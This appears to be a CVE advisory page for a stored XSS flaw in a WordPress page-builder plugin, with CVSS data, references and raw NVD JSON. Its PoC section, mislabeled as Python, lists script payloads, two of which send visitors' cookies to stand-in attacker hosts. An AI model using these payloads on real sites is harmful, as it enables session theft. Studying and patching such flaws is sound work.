CVE-2025-11162

Description

The Spectra Gutenberg Blocks – Website Builder for the Block Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2.19.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Spectra Gutenberg Blocks (Ultimate Addons for Gutenberg) ≤ 2.19.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// WordPress Contributor权限账户登录后执行
// 在页面编辑器的Custom CSS中注入以下代码：

// PoC 1: 基础弹窗测试
<script>alert(document.cookie)</script>

// PoC 2: 事件处理器XSS
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

// PoC 3: 持久化Cookie窃取
<script>
var img = new Image();
img.src = 'https://evil.com/log?c=' + encodeURIComponent(document.cookie);
</script>

// 修复后的安全写法示例：
// 插件应使用wp_kses()或esc_html()/esc_attr()对用户输入进行过滤和转义
function safe_css_output($css) {
    return esc_html($css);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11162
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11162
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11162/
[4] VulDB https://vuldb.com/cve/CVE-2025-11162
[5] https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-loader.php#L522
[6] https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-post-assets.php#L1418
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/2f077817-704f-4595-bfb1-80234dd23f8d?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11162", "sourceIdentifier": "[email protected]", "published": "2025-11-05T05:15:41.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Spectra Gutenberg Blocks – Website Builder for the Block Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2.19.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-loader.php#L522", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-addons-for-gutenberg/tags/2.19.14/classes/class-uagb-post-assets.php#L1418", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f077817-704f-4595-bfb1-80234dd23f8d?source=cve", "source": "[email protected]"}]}}